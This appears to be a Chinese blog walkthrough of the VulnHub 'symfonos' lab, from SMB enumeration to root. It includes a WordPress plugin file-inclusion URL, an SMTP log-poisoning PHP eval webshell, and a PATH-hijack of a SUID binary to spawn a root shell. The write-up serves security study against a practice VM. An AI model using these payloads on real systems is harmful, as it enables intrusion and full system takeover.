首页 > 其他分享 >vulnhub-symfonos(环境变量提权)

vulnhub-symfonos(环境变量提权)

时间:2024-01-23 15:44:36浏览次数:35  
标签:helios 0.110 symfonos 192.168 提权 vulnhub mail curl statuscheck

环境准备:

靶机-192.168.0.110

攻击机-192.168.0.128

演示:

首先nmap探测网段。

 打开网站发现为一张图片没别的内容

使用smbclient探测445端口内容

 

smbclient -L 192.168.0.110
-L:显示服务器端所分享出来的所有资源

发现存在helios用户,和anonymous,先访问下匿名用户资源

smbclient //192.168.0.110/anonymous

 存在attention.txt,下载出来打开

 

给了三个密码,发现qwerty是helios的密码,smb连接helios用户

 存在一个research.txt和tudo.txt,打开

 

给了个路径,拼接访问192.168.0.110/h3l105

 发现是wordpress,使用kali自带的wpscan来扫描。

wpscan --url http://192.168.0.110/h3l105/ --plugins-detection aggressive

 存在mail-masta,使用searchsploit搜索

 访问最后给的url

http://192.168.0.110/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

 存在文件包含漏洞,这里使用文件包含日志来获得shell。

端口发现存在25端口,访问邮件日志/var/mail/helios

http://192.168.0.110/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

写邮件植入webshell

telnet 192.168.0.110 25
MAIL FROM: MALABIS
RCPT TO: helios
data
<?php
eval($_POST["pass"]);?>
.
QUIT

使用蚁剑连接

 这里反弹到msf中

 

 用户权限为helios,进行提权,这里需要使用环境变量提权。首先创建一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

 查找suid命令

find / -perm -u=s -type f 2>/dev/null

 发现存在statuscheck似乎为用户创建的,使用strings命令查看statuscheck中的字符

strings /opt/statuscheck

 存在一个curl。

cd /tmp    切换目录
echo "/bin/sh" > curl    将sh写到tmp目录下的curl中
chmod 777 curl    赋权
export PATH=/tmp:$PATH   将tmp目录写到环境变量中
echo $PATH    输出环境变量,这样执行curl就会执行tmp目录下的curl,其实就为执行sh,
/opt/statuscheck   执行拥有suid权限的statuscheck,因文件会执行curl,本质就会用suid权限去执行sh

 

 

标签:helios,0.110,symfonos,192.168,提权,vulnhub,mail,curl,statuscheck
From: https://www.cnblogs.com/re8sd/p/17982622

相关文章

  • Mysql UDF提权实验
    通过实训平台学习一下UDF提权实验环境 实验原理udf='userdefinedfunction',即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,5.1之前位于“C:\Windo......
  • WIN32 动态 UAC 提权
    UAC(UserAccountControl)是Windows平台的用户权限控制。它可以让程序使用管理员权限执行某些操作。静态UAC提权静态UAC提权让程序一直运行在管理员权限下,只要在项目设置里把"UACExecutionLevel"设置为"requireAdministrator"。这样生成的exe文件图标会自动加上......
  • vulnhub-jangow:1.0.1
    jangow:1.0.1日常练习0x01信息收集nmap老规矩扫一扫192.168.56.118存活,80端口和21端口开着。逛了一圈没看到什么有价值的信息,爆破一下路径看看。site目录刚刚看过了,.backup看看是什么这里面有数据库的账户密码,暂时不知道是用在哪。到这里没有什么有用的了。0x02FT......
  • BC实战后渗透之Bypass Applocker到提权
    0x01前言 提示:当个反面案例看就好,实际上拿下的方式远没有下文说的那么麻烦,只怪自己太心急… 本来是之前BC项目搞下来的一个推广站,当时只拿到了Shell权限是一个普通用户,想提权进一步收集服务器上的信息时,发现运行各种东西都是权限拒绝,提示组策略阻止了这个程序,当时因为还有的别......
  • vulnhub-devguru(sudo提权)
    环境准备:靶机192.168.0.100攻击机kali192.168.0.128演示使用nmap扫描全端口首先访问80端口 信息收集发现访问/.git/config存在,使用githack获取源码  访问adminer.php,为一个mysql的登录界面。 查找配置文件,找到mysql登录密码。/config/database.php 登录数......
  • vulnhub-toppo(suid提权sudo提权)
    环境准备靶机192.168.116.138攻击机kali192.168.116.130演示直接访问webadmin目录下存在密码本使用ssh连接,账号ted,密码12345ted123使用项目进行探测LinEnumhttps://github.com/rebootuser/LinEnum 存在python可以使用suid提权使用python反弹shell /usr/b......
  • vulnhub下载
    importbs4importrequests#importlogging#logging.basicConfig(level=logging.DEBUG)defsearch_items(keywork:str)->list[str]:resp=Nonetry:resp=requests.get(url="https://vulnhub.com/?q={}".format(keywork))......
  • vulnhub-matrix(cve-2022-0847提权)
    环境准备靶机matrix192.168.116.134攻击机kali192.168.116.130演示启动靶机,使用nmap探测网段nmap192.168.116.0/24 扫描192.168.116.134全端口nmap-p1-65535192.168.116.134 访问网站 扫描目录gobusterdir-uhttp://192.168.116.134/-xphp,bak,tx......
  • vulnhub-lampiao(linux脏牛提权)
    环境准备靶机-lampiao攻击机-kali演示使用nmap探测内网网络,我这里使用NAT网络,网段为192.168.116.0/24nmap192.168.116.0/24发现192.168.116.136存活,扫描全端口nmap-p1-65535192.168.116.136 访问1898端口发现为drupal使用msf来进行攻击searchdrupal......
  • 【渗透测试】Vulnhub Corrosion 1
    渗透环境攻击机:   IP: 192.168.226.129(Kali)靶机:     IP:192.168.226.128靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/进行渗透一、获取端口信息nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。开放了22和80端口,访问8......